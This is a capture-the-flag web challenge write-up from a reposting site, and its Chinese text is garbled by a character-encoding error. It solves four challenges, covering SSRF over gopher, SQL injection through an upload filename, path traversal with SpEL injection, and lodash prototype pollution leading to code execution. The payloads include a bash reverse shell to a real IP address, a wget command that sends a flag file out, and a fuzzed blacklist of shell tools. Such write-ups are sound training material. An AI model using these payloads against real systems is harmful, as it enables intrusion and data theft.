ITÊýÂë ¹ºÎï ÍøÖ· Í·Ìõ Èí¼þ ÈÕÀú ÔĶÁ ͼÊé¹Ý
TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý 		ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý 		ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý 		Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡
 
   -> PHP֪ʶ¿â -> µÚ¶þ½ìÍøÈб­ WEB -> ÕýÎÄÔĶÁ

[PHP֪ʶ¿â]µÚ¶þ½ìÍøÈб­ WEB

Sign_in

Ò»µÀSSRF
image-20220424104104077
¿´Ò»ÏÂÍøÂçÇé¿ö

http://124.222.173.163:20003/?url=file:///proc/net/arp


·ÃÎÊһϠ100,ÒòΪ³¤µÄÆæ¹Ö

Èƺó¾ÍÊÇÌí¼ÓÒ»ÏÂXFF,RefÍ·ÐÅÏ¢,gopher´ò¹ýÈ¥¾ÍºÃ
exp

import urllib.parse
payload =\
"""
POST /?a=1 HTTP/1.1
Host: bolean.club
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
X-Forwarded-For: 127.0.0.1
Referer: bolean.club

b=1
"""  
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = '?url=gopher://172.73.26.100:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # ÒòΪÊÇGETÇëÇóËùÒÔÒª½øÐÐÁ½´Îurl±àÂë

FLAG:flag{Have_A_GoOd_T1m3!!!}

upload

ÌâÄ¿ÌáʾÓësqlÓйØ,Ëæ±ãÉÏ´«³¢ÊÔÔÚfilename¼Ó¸öµ¥ÒýºÅ


»ØÏÔ±¨´í

Error: insert into upload_file values('9e55ed4dd2c3418a9f3c6b39c5fb2290.sql'');<br>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''9e55ed4dd2c3418a9f3c6b39c5fb2290.sql'')' at line 1

ÀûÓñ¨´í×¢Èë¶ÁÒ»ÏÂÔ´Âë,sqlmap¿ÉÒÔÅܳöÀ´

index.php

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>??€???????? </title>
</head>
<body>
    <form action="" method="post" enctype="multipart/form-data">
        <input type="file" name="upfile">
        <input type="submit" value="????? ">
    </form>
</body>
</html>
<?php
    ini_set('display_errors',1);        
    ini_set('display_startup_errors',1);
    error_reporting(-1);
    $servername = "localhost";
    $username = "root";
    $password = "123456";
    $dbname = "upload";
     

    $conn = mysqli_connect($servername, $username, $password, $dbname);
    if(!empty($_FILES)){
        $filename_hz = explode(".", $_FILES['upfile']['name']);
        $name = array('jpg', 'jpeg' ,'png', 'gif');
        $filename_ = end($filename_hz);
        if(in_array($filename_, $name) || $_FILES['upfile']['type'] == "ctf"){
            $tmpname   = $_FILES['upfile']['tmp_name'];
            $name      = $_FILES['upfile']['name'];
            $file_name = md5(date('YmdHis').rand(100,999).$name).'.'.$filename_;
            $sql = "insert into upload_file values('$file_name');";
            if (mysqli_query($conn, $sql)){
                if(move_uploaded_file($tmpname, './upload/'.$file_name)){
                    echo $name.""."/upload/$file_name";
                }else{
                    echo $name." ";
                }
            }else {
                echo "Error: " . $sql . "<br>" . mysqli_error($conn);
            }
        }else{
        echo "............ctf";
        }
    }

Ö±½Ó±¨´í²Â flag ×Ö¶Î


FLAG:flag{5937a0b90b5966939cccd369291c68aa}

ez_java

  • spel×¢Èë

ÈÎÒâÎļþ¶ÁÈ¡

/download?filename=../../../web.xml

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>com.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>TestServlet</servlet-name>
        <servlet-class>com.abc.servlet.TestServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>TestServlet</servlet-name>
        <url-pattern>/test388</url-pattern>
    </servlet-mapping>

</web-app>

ÏÂÔØÁ½¸ö classÎļþ

/download?filename=../../../classes/com/abc/servlet/TestServlet.class
/download?filename=../../../classes/com/abc/servlet/DownloadServlet.class

TestServlet.class´æÔÚSPEL×¢Èë,ºÚÃûµ¥Æ´½ÓһϾÍÈÆÁË

URL±àÂëÒ»ÏÂpayload¼´¿É·´µ¯shell

POST:
http://124.220.9.19:8025/test388

name=#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"bash","-c","bash -i >&/dev/tcp/1.116.110.61/3000 0>&1"})}


FLAG:flag{123awerghjvxcvcjfreawe}

ezjs

  • Ô­ÐÍÎÛȾ
  • lodash

¿´Ï¿â,Óõ½ÁËlodash,Õâ¸ö°æ±¾´æÔÚ©¶´,npm install һϱ¾µØµ÷ÊÔ

´Ó´úÂëÖпÉÒÔ¿´µ½merge´æÔÚÔ­ÐÍÎÛȾ,È»ºóÓõ½ÁËtemplateº¯Êý

È»ºóÕÒµ½ÁËÎÄÕ ´Ó Lodash Ô­ÐÍÁ´ÎÛȾµ½Ä£°å RCE - °²È«¿Í,°²È«×ÊѶƽ̨ (anquanke.com),ÓиöÅäºÏ lodash.template ʵÏÖ RCE,ÎÛȾ sourceURL

payload

{"__proto__":{"sourceURL":"\u000areturn e =>{return global.process.mainModule.constructor._load('child_process').execSync('id')}"}}

µ«ÊÇÌâÄ¿µÄºÚÃûµ¥Ã»ÓÐÃ÷È·¸ø³ö,¸ú½øµ÷ÊÔÒ»ÏÂ,¼ÙÉèºÚÃûµ¥Îª¿Õ¡£

¶Ïµãϵ½template,ObjectµÄsourceURLÒѱ»ÎÛȾ
ÅжÏoptionsÖеÄsourceURLµÄÖµ,optionsÖв»´æÔÚ,ÏòÉÏÑ°ÕÒµ½Object,ÕâÀïÒѾ­ÎÛȾÁËËùÒÔ´æÔÚ

´Ëʱ

sourceURL = "//# sourceURL=\nreturn e =>{return global.process.mainModule.constructor._load('child_process').execSync('calc')}\n"

È»ºóÆ´½Óµ½ FunctionÖеĵڶþ¸ö²ÎÊý,Ôì³ÉÈÎÒâ´úÂëÖ´ÐÐ

ÐèҪעÒâµÄ

µ«ÊÇҪעÒâ,Function »·¾³ÏÂûÓÐ require º¯Êý,Ö±½ÓʹÓà require(¡®child_process¡¯) »á±¨´í,ËùÒÔÎÒÃÇÒªÓà global.process.mainModule.constructor._load À´´úÌæ¡£

¹ØÓÚFunction¹¹ÔìÆ÷(¹¹Ô캯Êý):NodejsÔ­ÐÍÁ´ÎÛȾÖÐlodashµÄÀûÓ÷½·¨·ÖÎö

var person = { age:3 }
var myFunction = new Function("a", "return 1*a*this.age");
myFunction.apply(person,[2])
// return 1*a*this.age ¼´ÎªfunctionBody,¿ÉÒÔÖ´ÐÐÎÒÃǵĴúÂë¡£

±¾µØ²âÊÔ¼¸¸ö±äÐεÄpayload,¿ÉÒÔÖ´ÐÐ

{"__proto__":{"sourceURL":"\u000areturn global.process.mainModule.constructor._load('child_process').execSync('calc')"}}

{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').execSync('calc')"}}

È»ºó¾ÍÊÇÊÖ¶¯fuzzÌâÄ¿µÄºÚÃûµ¥

¿Õ¸ñ
require
return
execSync
curl
bash
wget
echo
flag
nl
tac
cat(ûbanµ«ÊDz»Æð×÷ÓÃ)
*
?

payload

{
	"__proto__":{
		"sourceURL":
"\nglobal.process.mainModule.constructor._load('child_process').exec('wg'+'et${IFS}http://1.116.110.61:3000/`ta\"\"c${IFS}/.fl\"\"ag`')"
		}
}

×¢Òâ Content-Type: application/json

FLAG:flag{n0D3_1s_V3rY_v3Ry_very_v3rY_Fun_1sNt_it}
  PHP֪ʶ¿â ×îÐÂÎÄÕÂ
Laravel ÏÂʵÏÖ Google 2fa ÑéÖ¤
UUCTF WP
DASCTF10ÔÂ web
XAMPPÈÎÒâÃüÁîÖ´ÐÐÌáÉýȨÏÞ©¶´£¨CVE-2020-
[GYCTF2020]Easyphp
iwebsec°Ð³¡ ´úÂëÖ´Ðйؿ¨Í¨¹Ø±Ê¼Ç
¶à¸öÏß³Ìͬ²½Ö´ÐУ¬¶à¸öÏß³ÌÒÀ´ÎÖ´ÐУ¬¶à¸ö
php ûʼǼϳ£Ó÷½·¨ (TP5.1)
phpÖ®jwt
2021-09-18
ÉÏһƪÎÄÕ      ÏÂһƪÎÄÕ      ²é¿´ËùÓÐÎÄÕÂ
¼Ó:2022-05-01 15:30:26  ¸ü:2022-05-01 15:30:45 
 
¿ª·¢: C++֪ʶ¿â Java֪ʶ¿â JavaScript Python PHP֪ʶ¿â È˹¤ÖÇÄÜ Çø¿éÁ´ ´óÊý¾Ý Òƶ¯¿ª·¢ ǶÈëʽ ¿ª·¢¹¤¾ß Êý¾Ý½á¹¹ÓëËã·¨ ¿ª·¢²âÊÔ ÓÎÏ·¿ª·¢ ÍøÂçЭÒé ϵͳÔËά
½Ì³Ì: HTML½Ì³Ì CSS½Ì³Ì JavaScript½Ì³Ì GoÓïÑÔ½Ì³Ì JQuery½Ì³Ì VUE½Ì³Ì VUE3½Ì³Ì Bootstrap½Ì³Ì SQLÊý¾Ý¿â½Ì³Ì CÓïÑÔ½Ì³Ì C++½Ì³Ì Java½Ì³Ì Python½Ì³Ì Python3½Ì³Ì C#½Ì³Ì
ÊýÂë: µçÄÔ ±Ê¼Ç±¾ ÏÔ¿¨ ÏÔʾÆ÷ ¹Ì̬ӲÅÌ Ó²ÅÌ ¶ú»ú ÊÖ»ú iphone vivo oppo СÃ× »ªÎª µ¥·´ ×°»ú ͼÀ­¶¡

360ͼÊé¹Ý ¹ºÎï Èý·á¿Æ¼¼ ÔĶÁÍø ÈÕÀú ÍòÄêÀú 2024Äê5ÈÕÀú -2024/5/18 18:35:32-

ͼƬ×Ô¶¯²¥·ÅÆ÷
¡ýͼƬ×Ô¶¯²¥·ÅÆ÷¡ý 		TxTС˵ÔĶÁÆ÷
¡ýÓïÒôÔĶÁ,С˵ÏÂÔØ,¹ÅµäÎÄѧ¡ý 		Ò»¼üÇå³ýÀ¬»ø
¡ýÇáÇáÒ»µã,Çå³ýϵͳÀ¬»ø¡ý 		ͼƬÅúÁ¿ÏÂÔØÆ÷
¡ýÅúÁ¿ÏÂÔØͼƬ,ÃÀŮͼ¿â¡ý
  ÍøÕ¾ÁªÏµ: qq:121756557 email:121756557@qq.com  ITÊýÂë